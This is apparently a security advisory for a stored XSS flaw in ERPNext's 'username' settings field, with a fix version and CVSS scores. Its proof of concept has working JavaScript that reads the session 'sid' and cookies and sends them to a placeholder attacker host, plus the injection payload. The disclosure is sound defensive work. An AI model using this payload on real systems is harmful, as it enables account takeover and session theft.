We found results for “


Date: June 22, 2022


In ERPNext, versions v12.0.9-v13.0.3 are vulnerable to Stored Cross-Site-Scripting (XSS), due to user input not being validated properly. A low privileged attacker could inject arbitrary code into input fields when editing his profile.


ERPNext is affected by a stored XSS vulnerability that allows low privileged users to store malicious scripts in the ‘username’ field in ‘my settings’.
These scripts are executed in a victim’s browser when they open the page containing the vulnerable field. The victim who inadvertently triggers the attack, can be a highly privileged user, such as an administrator, so the injected scripts can extract the sid token and cookies, which can lead to full Account takeover and Privilege escalation. Moreover, there is an availability issue, once the JavaScript payload is stored on the server, the victim would not be able to browse through the platform.

PoC Details

1. Login to the application with low privileged user
2. Go to the settings option in the navigation bar and select my Settings.
3. Provide the malicious script in the ‘username’ field and click save. (from the PoC code)
4. Create a file named ‘test1.js’ and run an HTTP server (like python simple http server)

the content of the ‘test1.js’ file:
var re = /\\"sid\\":\\s\\"[0-9a-zA-Z]+\\"/gm;
var te = /[0-9a-zA-Z]+/gm;

var getSID = (document.documentElement.innerHTML).match(re);
getSID = getSID[0].split(':');
getSID = getSID[1].match(te);
url = 'http://[attacker-ip]:[attacker-port]/?sid='+getSID;
var script = document.createElement('script');
script.src = url+"&details= " + document.cookie;

5. open a tab in Incognito and go to the ERPNext server and login with a high privileged user , it will be redirected to the malicious page.
6. After a successful login, the ‘sid’ parameter will be sent to the Attacker which can then use it to login as Administrator

PoC Code

<!--</SCRIPT><script src=http://<attacker-ip>:<port>/test1.js></script>-->

Affected Environments

ERPNext versions v12.0.9 through v13.0.3


Upgrade to ERPNext version 13.1.0

Language: Python

Good to know:


Cross-Site Scripting (XSS)


Upgrade Version

Upgrade to version v13.1.0

Learn More

Base Score:
Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): Low
User Interaction (UI): Required
Scope (S): Changed
Confidentiality (C): Low
Integrity (I): Low
Availability (A): None
Base Score:
Access Vector (AV): Network
Access Complexity (AC): Medium
Authentication (AU): Single
Confidentiality (C): None
Integrity (I): Partial
Availability (A): None
Additional information: